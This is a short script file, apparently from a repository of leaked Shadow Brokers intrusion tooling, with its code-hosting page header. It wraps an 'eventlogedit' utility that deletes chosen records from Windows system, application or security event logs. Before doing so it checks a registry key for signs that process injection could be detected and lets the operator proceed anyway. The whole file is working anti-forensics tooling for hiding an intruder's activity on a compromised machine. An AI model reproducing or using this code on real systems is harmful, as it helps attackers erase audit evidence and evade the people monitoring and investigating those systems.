shadowbrokers-exploits/windows/Resources/Ep/Scripts/safeEventlogedit.eps

59 lines
1.8 KiB
PostScript
Raw Normal View History

#---------------------------------------------------------------------
# Name: safeEventlogedit.eps
# Changelog
# 6/11/2008 - Created
#
# Wraps eventlogedit to check for the noinject environment variable
# prior to executing.
#---------------------------------------------------------------------
if ($argc < 5) {
return (usage());
}
@echo off;
#####################################
# 6/30/2008
# Temporarily check for this BAD key
#####################################
if ( `regquery -hive L -subkey "software\\microsoft\\updates\\windows xp\\sp3"` ){
echo "*****************************************************";
echo "!!! A potentially bad Windows update hotfix was found";
echo " that might cause this system to BOUNCE !!!";
echo "*****************************************************\r";
SetEnv("NOINJECT", "TRUE");
}
bool $noInject = GetEnv("NOINJECT");
`addalias -alias actualEventlogedit -replace eventlogedit`;
if ($noInject) {
echo "!!! Warning !!!";
echo "Something on the system may be able to detect process injection.";
if (prompt "Do you want to stop what you're doing?") {
`removealias -alias actualEventlogedit`;
return false;
} else {
echo "Continuing at your own risk. Check to make sure you didn't cause a pop-up.";
@echo on;
`actualEventlogedit $argv[1] $argv[2] $argv[3] $argv[4]`;
@echo off;
}
} else {
@echo on;
`actualEventlogedit $argv[1] $argv[2] $argv[3] $argv[4]`;
@echo off;
}
`removealias -alias actualEventlogedit`;
# Usage statement
sub usage() {
echo "Usage: eventlogedit _Options_";
echo " This program allows the user to remove an entry from the event log.";
echo "Options:";
echo " <-log <logfile>>";
echo " One of system, application, or security";
echo " <-record <record_number>>";
echo " The number of the record you wish to delete";
}